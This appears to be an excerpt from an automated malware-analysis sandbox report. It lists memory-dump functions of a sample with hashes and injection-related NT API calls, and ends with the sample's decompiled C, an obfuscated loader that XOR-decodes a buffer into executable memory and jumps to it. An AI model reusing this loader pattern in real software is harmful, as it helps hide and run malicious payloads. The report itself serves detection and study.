Instruction ID: cead3f38184522018b5a45ef218e812ffc16934f866454ff775fd9a425d727ae
Opcode Fuzzy Hash: ee1f1e7bc003b954fe03a0cb3e5a33f2dd331da508f055488a21f845305eaf9b
Instruction Fuzzy Hash: 4A61B4B22380A64DCF174970996D3F8BF68CBC6915F4CA9D8C1E10F959D797A28F8390

Uniqueness

Uniqueness Score: -1.00%

Function 0221B932, Relevance: 1.7, APIs: 1, Instructions: 214nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 17aff46890715f0e49fffc2d472ee72dae93c4783174d6a237b9003a1e149ff8
Instruction ID: 1d3573e2eedf0700142249c087caf8550cd9069b657c3d029464669fb661d76b
Opcode Fuzzy Hash: 17aff46890715f0e49fffc2d472ee72dae93c4783174d6a237b9003a1e149ff8
Instruction Fuzzy Hash: 6A61E3F11781860ECF070A30ACAE7F97FA8DB96A05F0CA998D5D10F514C796629F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221B7FC, Relevance: 1.7, APIs: 1, Instructions: 211nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 81dcefa27b7ea7a858f075e8a3a8117dfe9e05b444a718f99416a8347e6898d2
Instruction ID: d80a74a7fccbccea8677621404e72d35cae8c92bb076085d30cc8afc82ca2ba7
Opcode Fuzzy Hash: 81dcefa27b7ea7a858f075e8a3a8117dfe9e05b444a718f99416a8347e6898d2
Instruction Fuzzy Hash: 406134F11781860ECF070A309CAE7F87FA8DB96A05F0CA5A8D5D10F418C39663DE9794

Uniqueness

Uniqueness Score: -1.00%

Function 0222EB8C, Relevance: 1.7, APIs: 1, Instructions: 209nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 85d996ca836c84d4f3007bb298457dc98352e3e31570c42d2f415c513280b276
Instruction ID: ad9ae2160ccdfa7ce79252ef779d0fb2bb6073e1ec4c220a70a5e764de1f2b87
Opcode Fuzzy Hash: 85d996ca836c84d4f3007bb298457dc98352e3e31570c42d2f415c513280b276
Instruction Fuzzy Hash: CE51F6B22380965DCF17497099693F8BF68CB86915F4C99D8C1E10FD58D7A7A28F8390

Uniqueness

Uniqueness Score: -1.00%

Function 0221BA7C, Relevance: 1.7, APIs: 1, Instructions: 190nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 1381b3b55524acdc4d57635d923a54240e44aa054b553b8878cada4d6a78010c
Instruction ID: f0f5392692827938ed62c77db8df7b88c3f8d271d79175056697d1d18cc13446
Opcode Fuzzy Hash: 1381b3b55524acdc4d57635d923a54240e44aa054b553b8878cada4d6a78010c
Instruction Fuzzy Hash: EF5113F11781C60ECF030A30ACAE7F97FA8DB96A05F0CA598D5D10F518C39662DE9794

Uniqueness

Uniqueness Score: -1.00%

Function 0221BBB2, Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dbaeb889fbc7b285e030d3d17cd64cf609ba35ce43a8913e921ac6af154e3d81
Instruction ID: 6fa9e276e908562843dafd846030a169e46a257565ea9cc6b936493b84155c68
Opcode Fuzzy Hash: dbaeb889fbc7b285e030d3d17cd64cf609ba35ce43a8913e921ac6af154e3d81
Instruction Fuzzy Hash: 7751C3F11780860ECF070A30AC6A7F9BF5CDB96A05F0CA598D5E10F514C796629F97A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221BE0D, Relevance: 1.7, APIs: 1, Instructions: 183nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 995aef386f2ea79f18b302ac28c0c7704a91bf04209788f924d84b70caf75d07
Instruction ID: 8738b3ef757bd551d998093afa6121af22ce80226f3802053cc0d1772ac22486
Opcode Fuzzy Hash: 995aef386f2ea79f18b302ac28c0c7704a91bf04209788f924d84b70caf75d07
Instruction Fuzzy Hash: F25181F11780D60ECF470A30AC6A6F9BF5CDB96902F4CA998C1E10F515C796629F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221BCDC, Relevance: 1.7, APIs: 1, Instructions: 181nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 6278514d1d1ff8b9b9eb10b77e596776bd1aa1aa81e261cd4056380a943b1efb
Instruction ID: 65ea50eaec9b1a8ade488ac65c1a5838ccd159c950e020c1524246614cd72d5b
Opcode Fuzzy Hash: 6278514d1d1ff8b9b9eb10b77e596776bd1aa1aa81e261cd4056380a943b1efb
Instruction Fuzzy Hash: 9251D2F11780C60ECF070A30ACAA7F9BF5CDB96A05F0CA998D5E10F514C796629F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221E245, Relevance: 1.7, APIs: 1, Instructions: 180memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0221E4AA

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 47090af975d024598bf14fb6e882bc7ae0870492529a44e5db241a43331adaef
Instruction ID: 4feb4188ac786e3d62d95e10c77be7d0b263fbb984d8f5b9fe55fb9732e30e1d
Opcode Fuzzy Hash: 47090af975d024598bf14fb6e882bc7ae0870492529a44e5db241a43331adaef
Instruction Fuzzy Hash: C2517DF21781D60ECF430A306C6E1F9BF98CB9A919B4C99D8C5E10F915D696638F93A0

Uniqueness

Uniqueness Score: -1.00%

Function 0222F270, Relevance: 1.7, APIs: 1, Instructions: 178nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: ce51c4b979f8f7cfeb65563289ff7f47d5a61dbc62a471fb25dfdfb5e44c5baa
Instruction ID: b1ca83c0b45fd1213d3ce1c09cf91a1def0be416a4e403aa0e265f7fa040eb01
Opcode Fuzzy Hash: ce51c4b979f8f7cfeb65563289ff7f47d5a61dbc62a471fb25dfdfb5e44c5baa
Instruction Fuzzy Hash: A1517FB21380D64DCF174A70996D3F8BF68CB86916F4CA9D8C1E10F959D79662CF8390

Uniqueness

Uniqueness Score: -1.00%

Function 0221E378, Relevance: 1.7, APIs: 1, Instructions: 175memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0221E4AA

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fa0ad59f38104f53ae321d30235650237251baf649308047e1d8cbb2ff80d79e
Instruction ID: dbbb47b0195995a6e1afda2563a384ad53992cc5cdf61a549dae410a4a1ba27c
Opcode Fuzzy Hash: fa0ad59f38104f53ae321d30235650237251baf649308047e1d8cbb2ff80d79e
Instruction Fuzzy Hash: 0D517CF21380D60E8F430A306C6E1F9BF5CCBDA916B48A9D8C5E10F915D696639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0221BF4D, Relevance: 1.7, APIs: 1, Instructions: 172nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0221C0A2

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: b8f063bf9f77c25dc19a92697c06a7fbd4e7ea1196db354a3dff57caf6432f99
Instruction ID: aea3980474849485dae23d9d768e0844b0b0151437cea67cf0c3256de491d172
Opcode Fuzzy Hash: b8f063bf9f77c25dc19a92697c06a7fbd4e7ea1196db354a3dff57caf6432f99
Instruction Fuzzy Hash: 4B5180F21780D60ECF070A30AC6A2F9BF5CDBD6906B4CA998C1E10F515C796639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0222F3D4, Relevance: 1.7, APIs: 1, Instructions: 163nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 0dde6f008843b45359a6ed0ba7f80a5ebb3a575aa94972f1aa2953309fffd683
Instruction ID: 69b761dbdf8530df6864b1083755f7a885cf14236558d897a3617d418af86ba2
Opcode Fuzzy Hash: 0dde6f008843b45359a6ed0ba7f80a5ebb3a575aa94972f1aa2953309fffd683
Instruction Fuzzy Hash: 3B414FA21780D60DCF470530A96E2F9BF68C7D6D16B8CA9D8C1E10F919D796638F83A4

Uniqueness

Uniqueness Score: -1.00%

Function 0222F519, Relevance: 1.7, APIs: 1, Instructions: 161nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 9f70d2cc51821c678ac219475113c2133f91388e246bf0d12f1d45bdde805821
Instruction ID: bbe72cab6d95dfbfa1c5350b9638e58cc0b98651d5f37dccf114dff2f264ef14
Opcode Fuzzy Hash: 9f70d2cc51821c678ac219475113c2133f91388e246bf0d12f1d45bdde805821
Instruction Fuzzy Hash: E341EAE22780D60D8F470530696E1F9BF6CCBD6C1678CA9D8C1E10F919D786639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0222F768, Relevance: 1.6, APIs: 1, Instructions: 150nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: ff1a2f466511f2da0003e74652594b5624d291a797b43345483e81860ce3221e
Instruction ID: e794e93dafb5ad49f96cacfd5b08ee091526e8e6fd47fd49f21623c2b26f90bc
Opcode Fuzzy Hash: ff1a2f466511f2da0003e74652594b5624d291a797b43345483e81860ce3221e
Instruction Fuzzy Hash: FF417AE22780D60D8F470530696E0F9BF6CC7D6C1638CA9D881E10FD19D796639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0222F658, Relevance: 1.6, APIs: 1, Instructions: 142nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 3fa5b65d4161374dae9ac07ce15fd3a37f2812f05dda81d1fbf780f8fccfdc06
Instruction ID: 8f36759713234bdb48fb8ba6cccc08e3a615107d47074524567f8cf6156030a2
Opcode Fuzzy Hash: 3fa5b65d4161374dae9ac07ce15fd3a37f2812f05dda81d1fbf780f8fccfdc06
Instruction Fuzzy Hash: 6D41BAE22780E60D8F4B0530696E1F9BF6CC7D7C1638CA9D881E10F919D786639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 0222F896, Relevance: 1.6, APIs: 1, Instructions: 139nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 7542e6309f9d97b817683d52cdec378908aa413cf4688de38d00d5536b8bfaf2
Instruction ID: 6f076a56ff4b686a019c5d1639d08c95b44b946adbdb4d9a82c066ddb41c71c8
Opcode Fuzzy Hash: 7542e6309f9d97b817683d52cdec378908aa413cf4688de38d00d5536b8bfaf2
Instruction Fuzzy Hash: A74169E21780D70D8F474530A96E0F9BF6CC7D6C1638CA9D881E10F919D796639F93A4

Uniqueness

Uniqueness Score: -1.00%

Function 022197DF, Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f018f63344cd621870e5c5d2fa103d6106b7c2182c8a191118aba3a2a5b9c250
Instruction ID: b628aeb714c9aeca00b6159dcef4ae70e5f66a8fd6d65bf401e5b835e2693b62
Opcode Fuzzy Hash: f018f63344cd621870e5c5d2fa103d6106b7c2182c8a191118aba3a2a5b9c250
Instruction Fuzzy Hash: 4841EDB0538391EFEB257FA4CC88FB872A2AF10754F154642F8569A0EDC7F59984CE12

Uniqueness

Uniqueness Score: -1.00%

Function 0221DC36, Relevance: 1.6, APIs: 1, Instructions: 113memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02224537: LoadLibraryA.KERNELBASE(?,00009B57,?,00000040,00000000,?), ref: 022249FE

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 0221E4AA

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 578baab8a77b283d1c9b4599787563fc799de96f0e3bcde4cca4ce82f189d8f8
Instruction ID: 53eef3b49409b41565282227b0acf94a6b57c3e391467bb72759ba244cdde960
Opcode Fuzzy Hash: 578baab8a77b283d1c9b4599787563fc799de96f0e3bcde4cca4ce82f189d8f8
Instruction Fuzzy Hash: 083169B1624744DFEB314FA9DC44BEE37D1AFA9324F014129ED459B288D3B05B86CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0222EB73, Relevance: 1.6, APIs: 1, Instructions: 110nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,?,?,000000C0,?,?,-00000001,?,022107CA,00000000,0221056E), ref: 0222F9CD

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fc62e7714dc47e67b87f5821d40e335d5b7ea9e25da4f4b73f8315564a398e37
Instruction ID: 10cd87bd58c26f1563974c6c3c97f9001e00643bd3889f6984bb3bfd9ea390a0
Opcode Fuzzy Hash: fc62e7714dc47e67b87f5821d40e335d5b7ea9e25da4f4b73f8315564a398e37
Instruction Fuzzy Hash: 42312830635226EEEF2989E4C7503B83A72EB46314F654169D9428B9ECD7B6848CC741

Uniqueness

Uniqueness Score: -1.00%

Function 0222E459, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,0222CA0C,00000040,0221AFA1,00000000,00000000,00000000,00000000,?,00000000,00000000,000000C0), ref: 0222E472

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 02221066, Relevance: 1.5, APIs: 1, Instructions: 9libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0222107B

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ffebf4b59d9230793cb0ed3c759556fcaa984a6b26c570e965f947035e967a7
Instruction ID: 1265fa7c0ff38dff0dce5967b871c01a4224d344fdc7d39620e80ac54cf106d9
Opcode Fuzzy Hash: 2ffebf4b59d9230793cb0ed3c759556fcaa984a6b26c570e965f947035e967a7
Instruction Fuzzy Hash: 54C08C711882980EC352B275081C6C53A841B81200BADC0EAC0448F80BEB994352A3C3

Uniqueness

Uniqueness Score: -1.00%

Function 00404CFF, Relevance: 1.4, APIs: 1, Instructions: 179
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 30%

			E00404CFF(void* __ebx, void* __edx, void* __eflags) {
				intOrPtr* _t143;
				intOrPtr* _t147;
				void* _t148;
				void* _t151;
				intOrPtr _t152;
				void* _t154;
				void* _t183;
				void* _t185;
				signed int* _t186;

				_t154 = __edx;
				asm("aaa");
				if(__eflags >= 0) {
					 *_t186 =  *_t186 ^ 0x00000000;
					 *(_t183 + 0x38) =  *(_t183 + 0x38);
					 *_t186 =  *_t186;
					 *(_t183 + 0x38) =  *(_t183 + 0x38) ^ 0x00000000;
					 *_t186 =  *_t186 ^ 0x00000000;
					asm("cld");
					asm("clc");
					 *(_t183 + 0x38) =  *(_t183 + 0x38) + 1;
					 *(_t183 + 0x38) =  *(_t183 + 0x38) - 1;
					asm("clc");
					 *_t186 =  *_t186;
					 *_t186 =  *_t186;
					 *(_t183 + 0x38) =  *(_t183 + 0x38) + 1;
					 *(_t183 + 0x38) =  *(_t183 + 0x38) - 1;
					 *_t186 =  *_t186;
					_t152 =  *0xffc1f473;
					 *(_t183 + 0x38) =  *(_t183 + 0x38);
					 *(_t183 + 0x38) =  *(_t183 + 0x38);
					 *(_t183 + 0x38) =  *(_t183 + 0x38);
					 *(_t183 + 0x38) =  *(_t183 + 0x38) + 1;
				}
				_t185 = _t183 + 1 - 1;
				asm("insd");
				 *0x830003ba =  *0x830003ba;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) ^ 0x00000000;
				 *0x830003ba =  *0x830003ba ^ 0x00000000;
				asm("clc");
				asm("clc");
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				asm("clc");
				_t143 =  *((intOrPtr*)(0x3e7a94));
				 *(_t185 + 0x38) =  *(_t185 + 0x38) ^ 0x00000000;
				 *0x830003ba =  *0x830003ba;
				do {
					 *0x830003ba =  *0x830003ba ^ 0x00000000;
					 *(_t185 + 0x38) =  *(_t185 + 0x38) + 1;
					 *(_t185 + 0x38) =  *(_t185 + 0x38) - 1;
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					_t143 = _t143 + 0x20 - 0x21;
					asm("cld");
					asm("fsqrt");
				} while ( *_t143 != _t152);
				 *(_t185 + 0x38) =  *(_t185 + 0x38) + 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) - 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) + 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) - 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *(_t185 + 0x38) =  *(_t185 + 0x38) ^ 0x00000000;
				asm("cld");
				asm("clc");
				asm("cld");
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *0x830003ba =  *0x830003ba;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) ^ 0x00000000;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) + 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) - 1;
				 *0x830003ba =  *0x830003ba ^ 0x00000000;
				 *0x830003ba =  *0x830003ba ^ 0x00000000;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *0x830003ba =  *0x830003ba ^ 0x00000000;
				asm("cld");
				 *(_t185 + 0x38) =  *(_t185 + 0x38) + 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) - 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				asm("cld");
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				asm("cld");
				 *0x830003ba =  *0x830003ba;
				asm("cld");
				asm("cld");
				 *0x830003ba =  *0x830003ba;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) + 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) - 1;
				asm("cld");
				 *0x830003ba =  *0x830003ba ^ 0x00000000;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *0x830003ba =  *0x830003ba ^ 0x00000000;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) + 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) - 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				asm("cld");
				 *(_t185 + 0x38) =  *(_t185 + 0x38) + 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) - 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *0x830003ba =  *0x830003ba;
				 *0x830003ba =  *0x830003ba;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				asm("cld");
				 *0x830003ba =  *0x830003ba;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) + 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38) - 1;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *0x830003ba =  *0x830003ba ^ 0x00000000;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *(_t185 + 0x38) =  *(_t185 + 0x38) ^ 0x00000000;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				VirtualAlloc(0, 0x26000, 0x1000, 0x40); // executed
				asm("clc");
				asm("cld");
				_t147 = E00404F78();
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *(_t185 + 0x38) =  *(_t185 + 0x38) ^ 0x00000000;
				_t151 = 0;
				asm("cld");
				 *0x830003ba =  *0x830003ba ^ 0x00000000;
				do {
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					 *0x830003ba =  *0x830003ba;
					_push( *((intOrPtr*)(_t154 + _t151)));
					asm("clc");
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					 *0x830003ba =  *0x830003ba ^ 0xfcb99724;
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					 *0x830003ba =  *0x830003ba ^ 0x00000000;
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					 *(_t147 + _t151) =  *0x830003ba;
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					_t151 = _t151 - 0xfffffffc;
					 *(_t185 + 0x38) =  *(_t185 + 0x38);
					 *(_t185 + 0x38) =  *(_t185 + 0x38) ^ 0x00000000;
				} while (_t151 != 0x21f24);
				asm("clc");
				_t148 =  *_t147();
				 *(_t185 + 0x38) =  *(_t185 + 0x38) ^ 0x00000000;
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				asm("cld");
				asm("cld");
				asm("clc");
				 *(_t185 + 0x38) =  *(_t185 + 0x38);
				 *(_t185 + 0x38) =  *(_t185 + 0x38) ^ 0x00000000;
				asm("clc");
				return _t148;
			}

0x00404cff
0x00404cff
0x00404d00
0x00404d02
0x00404d06
0x00404d0f
0x00404d13
0x00404d1d
0x00404d21
0x00404d28
0x00404d29
0x00404d2c
0x00404d35
0x00404d36
0x00404d40
0x00404d44
0x00404d47
0x00404d4a
0x00404d4e
0x00404d50
0x00404d54
0x00404d5d
0x00404d66
0x00404d66
0x00404d6a
0x00404d76
0x00404d79
0x00404d82
0x00404d86
0x00404d8f
0x00404d90
0x00404d91
0x00404d95
0x00404d96
0x00404d99
0x00404d9d
0x00404da1
0x00404da1
0x00404da5
0x00404da8
0x00404dae
0x00404db2
0x00404db6
0x00404db9
0x00404dbc
0x00404dbc
0x00404dc0
0x00404dc3
0x00404dc6
0x00404dc9
0x00404dd1
0x00404dd5
0x00404ddf
0x00404de9
0x00404dea
0x00404df1
0x00404df2
0x00404dfc
0x00404e00
0x00404e04
0x00404e07
0x00404e0a
0x00404e11
0x00404e15
0x00404e1e
0x00404e22
0x00404e29
0x00404e2c
0x00404e35
0x00404e3f
0x00404e46
0x00404e4a
0x00404e4b
0x00404e4f
0x00404e51
0x00404e52
0x00404e5b
0x00404e5e
0x00404e67
0x00404e68
0x00404e72
0x00404e76
0x00404e80
0x00404e83
0x00404e8c
0x00404e90
0x00404e92
0x00404e95
0x00404e98
0x00404ea1
0x00404ea5
0x00404eaf
0x00404eb3
0x00404ec0
0x00404ec4
0x00404ec7
0x00404ed0
0x00404ed4
0x00404ed8
0x00404edd
0x00404ee1
0x00404ee7
0x00404eec
0x00404ef0
0x00404ef4
0x00404ef6
0x00404ef7
0x00404ef8
0x00404efd
0x00404f01
0x00404f05
0x00404f07
0x00404f08
0x00404f0c
0x00404f0c
0x00404f10
0x00404f14
0x00404f17
0x00404f18
0x00404f1c
0x00404f23
0x00404f27
0x00404f2e
0x00404f32
0x00404f36
0x00404f39
0x00404f3d
0x00404f41
0x00404f44
0x00404f48
0x00404f4c
0x00404f54
0x00404f55
0x00404f57
0x00404f5b
0x00404f5f
0x00404f60
0x00404f64
0x00404f65
0x00404f6a
0x00404f6e
0x00404f6f

APIs

VirtualAlloc.KERNELBASE(00000000,000199DC,-00000002FFD5CB90,-0010B48B), ref: 00404EF4

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0d2170f7db106b865875f59e4ab3aa9dd1edb88c3f77393755d71d98666da5d2
Instruction ID: 1f2ac1645e7ae43e2a265e2a74eec3544023458dbc5d9da8148c3d50ef595a2a
Opcode Fuzzy Hash: 0d2170f7db106b865875f59e4ab3aa9dd1edb88c3f77393755d71d98666da5d2
